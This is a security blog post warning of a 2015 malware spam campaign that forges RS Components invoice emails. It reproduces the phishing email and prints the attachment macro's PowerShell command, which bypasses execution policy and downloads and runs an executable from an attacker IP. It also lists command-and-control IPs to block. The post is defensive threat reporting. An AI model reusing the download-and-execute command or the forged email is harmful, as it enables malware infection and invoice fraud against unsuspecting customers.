Sponsored by..

Tuesday, 31 March 2015

Malware spam: "83433-Your Latest Documents from RS Components 659751716"

This very convincing looking email pretending to be from RS has a malicious attachment. Although the email looks genuine, it is a simple forgery. RS are not sending out this email, nor have their systems been compromised in any way.

---------------------------------------------------------------

From:    Earlene Carlson
Date:    31 March 2015 at 11:30
Subject:    83433-Your Latest Documents from RS Components 659751716

RS Online Helping you get your job done.
You've received this email as a customer of rswww.com.


Dear Customer,


Please find attached your latest document(s) from RS.


Account Number
Date
Invoice Number
Document Total
Document Type
49487999
31-Mar-2015
659751716
£1133.90  
Invoice



For all account queries please contact RS Customer Account Services.

Tel: 01536 752867
Fax: 01536 542205
Email: rpdf.billing@colt.net (subject box to read DOC eBilling)


If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following:

Tel: 0333 8727520
Email: customers@colt.net


Kind regards,

RS Customer Account Services.


This service is provided by Swiss Post Solutions on behalf of RS Components.
Helping you get
your job done


RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK.
Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867.

---------------------------------------------------------------

The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).

There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
For some reason, the EXE is download from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.

Analysis is still pending, but the VirusTotal report does indicate the malware phone home to 188.120.225.17 (TheFirst-RU, Russia) which I strongly recommend blocking, check back for more updates later.

UPDATE:
Automated analysis [1] [2] [3] [4] show attempted connections to the following IPs:

188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)

It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.

Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169

6 comments:

Andy said...

I've just received this email as well, I have just deleted it - thanks.

Zoe2293 said...

I also received this email. I opened it as it was convincing however, I did not download the file attached. I am a mac user and was wondering if anything could have snuck on to my laptop??

alistairlowe said...

Thank you for the heads up, I received this and nearly panicked, it is rather convincing.

kid said...

You're saving computers, THANKS! This looked very convincing, almost clicked the attachment for more info.

caulkehead said...

Yup - spam e-mail just received. Having just placed a bonafide order from RSC I was expecting an invoice so this particular scam seems to be relying on less-observant purchasers of RS products and whoever it is presumably has access to the RS sales data. RD London

Jaine said...

Hi,

Another address worth blocking is
185.91.175.64